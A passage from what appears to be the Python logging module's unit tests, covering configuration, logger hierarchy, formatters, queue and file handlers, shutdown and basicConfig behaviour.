self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.debug('This should not appear')
self.assertEqual(sio.getvalue(), '')
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', IOError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', IOError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', IOError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
def test_filemode(self):
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExecptions', old_raise)
logging.raiseExceptions = True
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExecptions', old_raise)
logging.raiseExceptions = False
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
